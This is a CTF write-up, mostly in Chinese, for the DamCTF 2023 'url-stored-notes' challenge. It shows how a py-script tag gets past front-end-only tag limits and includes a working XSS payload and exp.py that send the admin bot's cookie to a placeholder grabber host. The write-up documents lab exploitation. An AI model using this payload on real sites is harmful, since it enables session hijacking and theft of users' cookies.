Rating:

>M1ll_0n
>41 solves / 459 points
>
>Ever seen that neat paste program by topaz for advent of code? Yeah, well this is like 100% better and more secure since it's for note card sharing.
Admin bot at /admin
>
>http://url-stored-notes.chals.damctf.xyz
>
>http://64.227.26.193
>
>[url-notes.zip](https://rctf-bucket.storage.googleapis.com/uploads/785b930a6369cfb78baea2bb62079266bb48d5e4d6ae52d918a7f5eee20bebec/url-notes.zip)

题目给出了源码,根据源码可以判断需要通过 XSS 窃取 admin bot 的 cookie

站点是一个留言板,可以输入 prompt 和 answer 生成一个临时链接。

![20230408142400](https://de34dnotespics.oss-cn-beijing.aliyuncs.com/img/20230408142400.png)

访问临时链接就可以访问到我们写入的内容。

![20230408142621](https://de34dnotespics.oss-cn-beijing.aliyuncs.com/img/20230408142621.png)

正常情况下,我们写入的内容都被包裹在 textContent 里面,也就是无法解析了。

```js
promptElement.textContent = prompt;
answerElement.textContent = answer;
```

值得关注的是,站点仅使用了前端代码来限制使用的 tag,因此实际上其他的标签也是可以直接使用的。
```js
const SUPPORTED_TAGS = ['p', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'i', 'code'];
```

关注到站点使用了 py-script 来操作页面元素,我们同样可以通过添加 py-script 标签来注入 python 代码,由此来添加 XSS payload:

py-script payload 的功能根简单,添加一个 `<script>` 标签获取 cookie。
```py
import js

script_tag = js.document.createElement('script')
script_tag.innerHTML = "document.location='http://xxxxxxx/XSS/grabber.php?c='+document.cookie;"
js.document.head.appendChild(script_tag)
```

exp.py
```py
from base64 import b64encode, b64decode
from lzma import compress, decompress
import json
import requests

notes = {}

def note_decode(encodedNotes):

encoded_notes = encodedNotes.encode()
decoded_notes = decompress(b64decode(encoded_notes))
notes = json.loads(decoded_notes.decode('utf-8'))
return notes

def note_encode(Notes):
encoded_notes = json.dumps(Notes)
encoded_notes = compress(encoded_notes.encode())
encoded_notes = b64encode(encoded_notes).decode()
return encoded_notes

def send_request(data):
url = "http://64.227.26.193/#{}".format(data)
res = requests.get(url)
print(res.text)

if __name__ == "__main__":
note = [
{
'prompt': '''
import js

script_tag = js.document.createElement('script')

script_tag.innerHTML = "document.location='http://xxxxxxx/XSS/grabber.php?c='+document.cookie;"

js.document.head.appendChild(script_tag)
''',
'answer': '',
'tag': 'py-script'}
]
encoded_note = note_encode(note)
print(encoded_note)
# send_request(encoded_note)

```

流程图如下:
```mermaid
sequenceDiagram
participant Attacker
participant Website as Website Frontend
participant Admin_Bot as Admin Bot

Attacker->>Website: Access website
Attacker->>Website: Enter prompt and answer
Website->>Attacker: Generate temporary link
Attacker->>Admin_Bot: Submit temporary link

Note over Attacker,Website: Bypass front-end tag limitation
Attacker->>Website: Inject py-script with XSS payload

Website->>Attacker: Generate temporary link

Attacker->>Admin_Bot: Submit temporary link

Admin_Bot->>Attacker: Trigger XSS payload and send stolen cookies

```

[original writup](https://dummykitty.github.io/2023/04/09/DamCTF-2023-Writeup-Web/#url-stored-notes) (https://dummykitty.github.io/2023/04/09/DamCTF-2023-Writeup-Web/#url-stored-notes)